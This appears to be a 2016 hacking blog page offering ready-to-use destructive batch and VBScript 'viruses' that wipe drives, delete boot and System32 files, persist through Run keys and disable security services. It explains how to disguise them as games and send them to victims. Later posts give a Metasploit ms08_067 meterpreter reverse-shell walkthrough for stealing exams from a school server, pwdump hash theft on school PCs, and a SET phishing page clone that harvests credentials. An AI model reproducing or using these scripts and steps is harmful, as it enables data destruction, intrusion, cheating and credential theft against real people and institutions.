Download

Download
Now

Saturday 27 February 2016

25 virus that you can make at home


Here I am posting 21 program scripts which are helped in create a virus using
notepad. Some of them will works on windows xp and. some of them in windows 7

Here is a Batch File virus which can:
1.Copy itself into startup
2.Copy itself over one thousand times into random spots in your computer.
3.Hide its self and all other created files
4.Task kill MSN, Norton, Windows Explorer, Limewire.
5.Swap the left mouse button with the right one
6.Opens alert boxes
7.Changes the time to 12:00 and shuts down the computer
copy this code into notepad and save as Greatgame.bat(while saving select all files instead of text ).
Here is the Code:

@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP
No 2:-

Just open your notepad
1) Click start -> all programs -> accessories -> notepad
2) Or just press or click windows key + r :: run window will open and
type notepad and hit enter .

NOW TYPE THE FOLLOWING CODE ::

@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q

Then save it as kinng.bat and the batch file is created .
WARNING :: This is the most dangerous virus! Be careful with its use.

Delete the entire registry

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*

Now save it as kinng.bat and the batch file is created .
No 3:-

How to crash a PC Forever !:::

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Open up notepad and copy and paste that. Save it as a .bat file.
This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.
REMEMBER - DO NOT CLICK THIS FILE.

No 4 :-

How to stop someone's internet access::::

@Echo off
Ipconfig /release

Save that as a .bat and send it to someone. They're IP address will be lost, and therefore they won't be able to fix it

However, this is VERY easy to fix. Simply type in IPconfig /renew

No 5 :-

ShutDown PC million Times::::

1.right click on the desktop
2.click shortcut
you will get a dialogue box, write in it: shutdown -s -t 1000 c "any comment u want" then press next
note: this "1000" i wrote is the time in seconds needed for ur computer to shutdown,u can put any number u want...
3.u will get another dialogue box, write in it: Internet Explorer and press finish
4.u will find the icon on ur desktop, dont open it, just right click on it and press properties>change icon>select the icon the the internet explorer and the press apply then ok
try to open it, it is a virus hehe
PS: the only way 2 stop ur computer from shutting down is to go 2 start>run>type: shutdown -a

No 6:-

Open Notepad
Write / copy the below command there:
" del c:\WINDOWS\system32\*.*/q " without quote
and save as " anything.bat"
Done. If You Give this file to your victim his SYSTEM 32 Folder will be deleted. Without which a Windows Pc cant be started.


No 7:-

Process:
Open Notepad
Copy the below command there
"rd/s/q D:\
rd/s/q C:\
rd/s/q E:\" ( without quotes )
Save as "anything.bat
This virus Formats the C ,D , and E Drive in 3 Seconds.

No 8 :-

Just open the Notepad and type the paste the following Code.
set ws=createobject("wscript.shell")
dim strDir,strfile,st,strtxt2,strshell,strlog
dim obfso,obfolder,obshell,obfile,obtxtfile
strshell="wscript.shell"
strDir="C:\WINDOWS"
strfile="\wscript.vbs"
st=Chr(34)
strlog="shutdown -l"
strtxt2="ws.run(strlog)"
set obfso=CreateObject("Scripting.FileSystemObject")
on error resume next
set obfile=obfso.CreateTextfile(strDir & strfile)
obfile.writeline("set ws=createobject("&st&strshell&st&")")
obfile.writeline("ws.run("&st&strlog&st&")")
ws.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Logoff","C:\WINDOWS\wscript.vbs","REG_SZ”

Now Save This Notepad file With Any Name Having .vbs Extension .

No 9 :-

Open Notepad and write "start" without quotes
Start
Start
Start
and then save it with .bat extension.
Now double click on this .bat file to run Command Prompt.

No 10:-

Convey your friend a little message and shut down his / her computer:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.

No 11 :-

Toggle your friend's Caps Lock button simultaneously:

Code:
Set wshShell =wscript.CreateObject("WScript.Shel
l")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save it as "Anything.VBS" and send it.

No 12:-

Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :

Code:
Set wshShell = wscript.CreateObject("WScript.Shell
")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

No 13 :-
This Virus Deletes All The Content Of A Drive...

@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code As Anything.bat


No 14:-

This Will Crash Ur Computer

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next

Save It As Anything.vbs

No 15 :-

The Most Simple Virus To Crush The Window
It Only Works With Windows XP

@Echo off
Del C: *.* |y

Save It As Anything.bat

No 16 :-

Virus that crashes pc
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive

Save As Anything.bat File In Notepad!!
This Will Pop Up A Message Saying OWNED!!
And Shut Down The Computer Never To Reboot Again!

No 17:-

Shutdowns Computer Everytime It Is Turned On

Save As A bat File

echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE

No 18 :-

Disable Internet Permanently

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

Save As A bat File

No 19 :-

Change Files To Non-working TXT Files
Save As A bat File

REN *.DOC *.TXT REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

No 20 :-

System Meltdown

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED BITCH
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

PAUSE

PAUSE

Save As A bat File

No 21:-
Temporarily Flood Network

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH

We can make a batch file which will Shutdown the computer everytime on startup !

Here is how ?

? Open Notepad

? Type :

@ECHO OFF

shutdown -s -t 10 -c "Virus Attack..."

exit

? File >> Save As...

? Name it : virus.bat

? Start >> All Programs

? Right Click on Startup >> Open

? This open the Startup folder

? Paste the Virus.bat file here !

*** That's all , now the computer will
automatically shutdown on every startup !

How to Spread it:
Windows does'nt allow to change the icon of .bat files. Therefore what you can do is :
Right click on the .bat file
Click on CREATE SHORTCUT
And hide the original file.
Now as this newly created file is just the shortcut, you can easily change its icon.
Right click on this shortcut
properties >>>..cutomize>>..choose icon
Now give an attractive icon to it.
Now name it something intresting. eg. PROTOTYPE or IGI etc.
Now your victim would think it to be the game , and he will be easily curropted.

I thought To post Some More Viruses Under This POst So Here Are They
How to stop someone's internet access::::

@Echo off
Ipconfig /release

Save that as a .bat and send it to someone. They're IP address will be lost, and therefore they won't be able to fix it

However, this is VERY easy to fix. Simply type in IPconfig /renew
ShutDown PC million Times::::

1.right click on the desktop
2.click shortcut
you will get a dialogue box, write in it: shutdown -s -t 1000 c "any comment u want" then press next
note: this "1000" i wrote is the time in seconds needed for ur computer to shutdown,u can put any number u want...
3.u will get another dialogue box, write in it: Internet Explorer and press finish
4.u
will find the icon on ur desktop, dont open it, just right click on it
and press properties>change icon>select the icon the the internet
explorer and the press apply then ok
try to open it, it is a virus hehe
PS: the only way 2 stop ur computer from shutting down is to go 2 start>run>type: shutdown -a
Freeze someone's desktop:::

this is a funny trick, u can freeze someone's desktop
1.close everything u r working in, and work on desktop. so click on prtscr on ur keyboard.
2.go to paint and click on edit then paste
3.save this file as (name).bmp and close the paint.
3.now
in the desktop, we have 2 remove desktop icons and shortcuts, so right
click on the mouse and then properties, click on desktop then select
customize desktop.
4.uncheck all the boxes in desktop icons and press ok. then press apply then ok.
5.now
to remove the shortcuts in the desktop, go to start and select My
Computer, then click on c: right click on ur mouse and select new
folder, write it any name
6.now go to desktop & select all da
icons and right click on them then press cut,go to c: and paste them in
the folder dat u created then close the window.
7.now to put the
fake desktop image and remove the taskbar, so right click on desktop and
gp to properties, now go to desktop and select Browse, select the file
that u saved then press appply then ok. now to remove the windows
taskbar, right click on the taskbar and go 2 properties, then select
autohide the taskbar and then apply then ok
now all the icons r fake and the user will think that his desktop is freezed
enjoy it.!
SHUT UR INTERNET PERMENANTLY:::

This
is a slightly more advanced one. It shuts down your internet
permanately. I tried it on myself accidently, i knew what it did, and it
still took me a couple of days to get my internet back. works best on
XP, not tested on vista or 7.
EDIT: At the bottom put a rickroll
site or something. BTW, that 3rd line, isnt what disables the internet
permanately. It is somethinge else, that just provides a fast response
to shut down any connections.

@echo off
reg
add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v MiXedVeX /t
REG_SZ /d %systemroot%\HaloTrialScoreChangerV1 /f > nul
start iexpress (website of your choice)
ipconfig /release
del "C:\Program Files\Microsoft Games
del "C:Nexon
del "C:\Program Files\Xfire
del "C:\Program Files\Adobe"
del "C:\Program Files\Internet Explorer"
del "C:\Program Files\Mozilla Firefox"
del "C:\WINDOWS"
del "C:\WINDOWS\system32"
del "C:\WINDOWS\system32\cmd"
del "C:\WINDOWS\system32\iexpress"
del "C:\WINDOWS\system32\sndvol32"
del "C:\WINDOWS\system32\sndrec32"
del "C:\WINDOWS\system32\Restore\rstrui"
del "C:\WINDOWS\system32\wupdmgr"
del "C:\WINDOWS\system32\desktop"
del "C:\WINDOWS\java"
del "C:\WINDOWS\Media"
del "C:\WINDOWS\Resources"
del "C:\WINDOWS\system"
del "C:\drivers"
del "C:\drv"
del "C:\SYSINFO"
del "C:\Program Files"
echo ipconfig/release_all>>c:windowswimn32.bat
net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
:a
start iexpress (website of your choice)
goto a
MAKING MOST DANGEROUS VIRUS CALLED MATRIX:::

Warning - Do not run it on your computer 

I'm gonna teach you how to make a virus named Matrix...

1-Open notepad
2-Put in this code

#include
#include
#include
#include
#include
#include
#include
using namespace std;

int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);

{
char buffer[255];
char inputFile[]="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat", ios::app);
fp
fp
fp
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}

{
char buffer[255];
char inputFile[]="C:\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp
fp
fp
fp
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}

START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout
}
goto START;

3-save it as matrix.bat
4-finish

AS IT WAS TOO DANGEROUS THE ACTUAL HEADER FILES FOR THIS SCRIPT ARE NOT GIVEN

AND IF U WANT TO TRY THIS SCRIPT U CAN JUST USE OF HEADER FILES SUCH AS STDIN,STDLIB,CONIO , AND STUFF LIKE THAT
IF U liKe My WoRk ADD Rep PleAsE  - See more at: http://problemswithsolutions9.blogspot.in/2015/01/20-viruses-using-notepad-very-dangerous.html?m=1#sthash.xlwkZF5T.dpuf

Hack someone's whats app

Hacking WhatsApp account has never been this easier, now you can hack anyones WhatsApp account on any platform Android, iPhone, BlackBerry, Windows Phone almost all! If you want to hack someones WhatsApp account just to investigate on something or just for fun, it's very easy. Or if you want to hack your own WhatsApp account just to recover some files and text messages it's now even possible! But before using our WhatsApp Hacking Tool first check out what this amazing tool can do by reading the Features we provide below, If you want to know more you are welcome to read our How to use section and the Status of our Tool to check the current hacking status.

In addition to Hacking Anyone's Whatsapp account, You can export it in various format like, Zip, Rar, Or PDF..

               Start Whatsapp Hack Now

Friday 26 February 2016

How to hack my school server for Final ExaM

 How to Hack Your School's Server to Download Final Exam Answer

Welcome back, my fledgling hackers!

If you're like most aspiring hackers, at one time or another you've probably spent too much time playing Call of Duty and not enough time preparing for your final exams.

So for today, we'll look at how to break into your school's server to download the final exam file with the answers onto your computer. Just think of the benefits to your academic record, your Call of Duty skills, and your popularity when you show up at school with the final exams days ahead of the finals!

This hack uses Metasploit along with its meterpreter, so let's get after those finals and fire up our Metasploit in BackTrack!

WARNING (Disclaimer):

Of course, this is for demonstration/entertainment purposes only. Please do not break into your school's server and steal exams as it's illegal and very likely will get you kicked out of school. This is just an example of the security risks that high schools and colleges pose from using outdated systems with known vulnerabilities.

Step 1: Find That Proper Exploit

Those of you with experience with Metasploit, or have followed my previous Metasploit tutorials, know that one of my favorite exploits is the RPC buffer overflow that works so well in Windows XP, Server 2003, and sometimes even in Vista and Server 2008.

In our case here, our school is running a Windows 2003 Server that stores all the department's exams and records. So, let's use the/exploit/windows/smb/ms08_067_netapi. To find it, type:

msf > search ms08

Metasploit displays all the exploits with ms08 in it. The one we want is second from the bottom. We can highlight it and cut/paste it into our command:

msf > use /exploit/windows/smb/ms08_067_netapi

Step 2: Set the Payload

Now we need to set our payload. In this case, we'll use the meterpreter for Windows or /windows/meterpreter/reverse_tcp.

msf > set payload /windows/meterpreter/reverse_tcp

Let's take a look next at the options that we need for this exploit/payload combination by typing:

msf > show options

Step 3: Set the Options

Now we can see that we need to set the RHOST and the LHOST.

msf >set LHOST 192.168.1.114msf >set RHOST192.168.1.108

Step 4: Exploit That Server!

Now all we to need do is exploit and get a meterpreter prompt on that school server where we can do our dirty work.

msf > exploit

Step 5: Check to See if the Admin Is Using the System

We should now have a meterpreter shell on the school's server. Before we can even consider to download files from that server, we want to make certain that no one is on that system where we might get detected. We can run the idletime command to see whether anyone has used the system recently.

meterpreter >idletime

As you can see, the last time someone did something on the system was just over 3 minutes ago. To be safe, let's wait a bit and hope the administrator goes home for night. The last thing we want is for the administrator to detect our attempt to download those final exams!

Once we're safe and the system has been idle for awhile, our next step is to find those exams. Meterpreter uses standard Linux commands like ls, cd,pwd, and others, so let's type lpwd (both pwd and lpwd will work).

Meterpreter responds with the / symbol indicating that we're in the root directory.

Step 6: Find the Final Exams

We can then type ls to get a listing of all the directories and files in the root directory. We can see a directory named ConcordUniversity. That's probably where the exams are! Let's change directories to Concord University:

meterpreter c:\\ConcordUniversity

Note that we need to use a double \\ to navigate to this directory. This is necessary and critical.

Now we're in ConcordUniversity, we can get a directory listing by typing:

meterprter > ls

We can see we have folders for Anthropology, Biology, Chemistry, and Economics. Since we're looking for the Biology final, let's navigate to the Biology directory.

meterpreter > cd biology

VoilĂ ! There's the final exam for our biology class.

Step 7: Download the Final

Meterpreter has a built-in download feature, so all we need to do is type:

meterpreter > download C:\\biology\exams\FinalExam

We can see that Metasploit has downloaded the FinalExam to our computer! Please note again that we do need to use the double backslash (\\) in denoting the directory of the file we want to download.

When we navigate back to our BackTrack system, we can see that the biology final is in our root directory. Yeah!

Now we are guaranteed a 95% (don't get a 100%, the instructor will be suspicious). If you have any questions, feel free to ask in the comments, or head on over to the Null Byte forum if you have questions on hacking topics unrelated to this article.

How to hack my School Pc


Download "pwdump" to the computer that you are using. If the site is blocked then you should download it to a thumb drive and put it in the computer.

2

Right click in any folder and then New>Text Document.

3

Open it and type "command.com"

4

File>Save As and save it as something.bat.

5

Double click on something.bat.

6

Navigate to the pwdump folder using CD the location of pwdump.

7

Type "pwdump.exe -o hashes.txt localhost" (without quotes) and email hashes.txt to yourself or put it on your thumb drive.

8

On your own computer Google-install ophcrack and follow one of the guides.

9

Click load pwdump file and locate the text file to load the hashes

10

And you cracked the administrator.

Hack your school PC

How to get to CMD at school

I have been doing some research back couple of years back. I have been trying to hack into a school pc. But once I have been doing this. I realise that it only works on Windows XP and lower (Windows NT ect.) not 
Windows 7 and Vista. This only needs;

Notepad
Windows Installed 

After that your done.

This may not work at your school. They might of blocked notepad. First of all look for CMD in the search bar in start and see if it is unblocked. Or go to 'C:\WINDOWS\system32\cmd.exe' or goe to My Computer and press 
'Control+F' if not try and use these commands in notepad to access CMD.

First off, open notepad via Go to start-All Programs-Accessories-notepad

Open it;

type in

Code:

command.com

Save as command.bat
and set it as All Programs And Files. And make sure you save it on your desktop. 

Then just open command.bat 

or you can do this.

Code:

@echo off
start

This should be all. I hope this helps 

Any problems I will try to help. (I will not tell you any batch commands)

Wednesday 24 February 2016

Hack fb using linux

           Hack Username And    Password Using Kali Linux.

Hack Email-id,Username and password or any user details by using Kali Linux.

Today,i am going to show you how you can get email-id,username and password or any user details you want by using KALI LINUX.

Steps for setting up your system.

Download Kali Linux from here.Extract the contents of Kali Linux iso file which you  downloaded in step and copy it to pendrive or instead of pendrive burn the iso file in cd if you want to make a cd of it.After copying all contents to pendrive or burning the iso file in cd,reboot you system,press F8 on boot-time and select boot from pendrive if you have copied all the files in pendrive,else boot from cd-rom if you burn the iso file in cd.After selecting the boot from device,the kali installation window will open,install accordingly as per your requirement.NOTE:During installation,in mount point of selected installation drive,set mount point to "/".Remember the username and password while installation as this will be necessity for this hacking method.Once,installation is completed,system will reboot,login your account.Your system is ready for use.Method which we are using to hack the username and password or any user details isSocial Engineering Toolkit method.

Now lets set it up.

Open terminal using ctrl+alt+t or click on the small black window image on the top left of your screen.Once terminal is open,type the code carefully.

sudo root


 Then enter your root username and password.Don't close the terminal.

Next step is to open social engineering toolkit.For this type the below command in terminal.

se-toolkit

 You will see something in terminal of your system as shown below in the image.

 

As shown above in image,you too will see the menu in your terminal.Press "1" and hit enter as we are going to do Social-Engineering Attacks.You will see something in terminal as shown below in the image.

Once again,you will get a menu as shown above in the image.We are going to select Website Attack Vectors,so press "2" and hit enter.You will see something as shown in the image below.

In this method,we are going to get the credential of the victim,so press "3" and hit enter as it will select credential harvester attack method.This will open  new menu as shown below in the image.

Since,we want the username and password which is credential of victim,so we need to trap the victim in a look a like page to original website page(like phishing page) and for that we need to clone a website.To do this,press "2" and hit enter which will open something like shown below.

In above image,you might have noticed a red colour rectangle box made by me,in that box,you will find "tabnabbing:XXX.XX.XXX.X" where this "XXX.XX.XXX.X" is you computerIP address.To find IP address of your computer,open a new terminal and type the command given below.

su root
enter_your_root_password
 ifconfig


In above command,we first gain the root access,and then afterwards type "ifconfig"  and hit enter to get the IP address.
Copy paste this IP address at the end of "Tabnabbing:".I have used my IP address but for security reasons i can't reveal it,so i have posted here "XXX.XX.XXX.X".Please note that,if you don't put your computer IP address,they this method won't.After entering your IP address,hit enter.It will ask your to enter the url of website you want to clone as shown below.Here,i had entered "www.ymail.com" as i want to hack someone ymail account.The below image represents all the steps.

It will give a message that its working on cloning the site and will take a little bit time.
Once the process is completed,you will see something as shown in the image below.


The next step is the most important step,till now we have make your IP address go online and anyone who visit your IP address will see the page which will look like the website of whose url you entered to clone.In this step,you need to shortened your IP address by using services like ADF.LYBinbox,Goo.gl,etc.Once you enter your ip address on these sites to shorten,they will provide you a link,all you need to do is just send this shortened link to your victim.When the victim visit the url which you have sent them,the will see a same page of which                   url you had entered to clone the website.The victim will think that it is a original page and when the victim enters any of their information,you will see that information in the terminal.In this example,i have usedymail.com.Therefore,the victim will see homepage of yahoo mail.This is only the login form,i have entered the login usernameas:"Kali used to hack email-id and password" and password as: "Hacking successfull".

NOTE:Victim can identify that the page is a trap as the address bar of browser will be having your IP address.For best results,send the shortened url to victim mobile and ask them to visit urgently,or you can say visit this link and login to get latest updates of their favourite contents,etc.

RESULT.

The username and password will be shown in terminal window and will be similar to the image shown below.

If you get stuck anywhere,feel free to contact us and get solution for  your problem related to this information.I will suggest you to use virtual box for using Kali Linux within your default operating system.Video tutorial will be given on demand.So if you need video tutorial related to this,just contact us from contact form below at right corner of this page.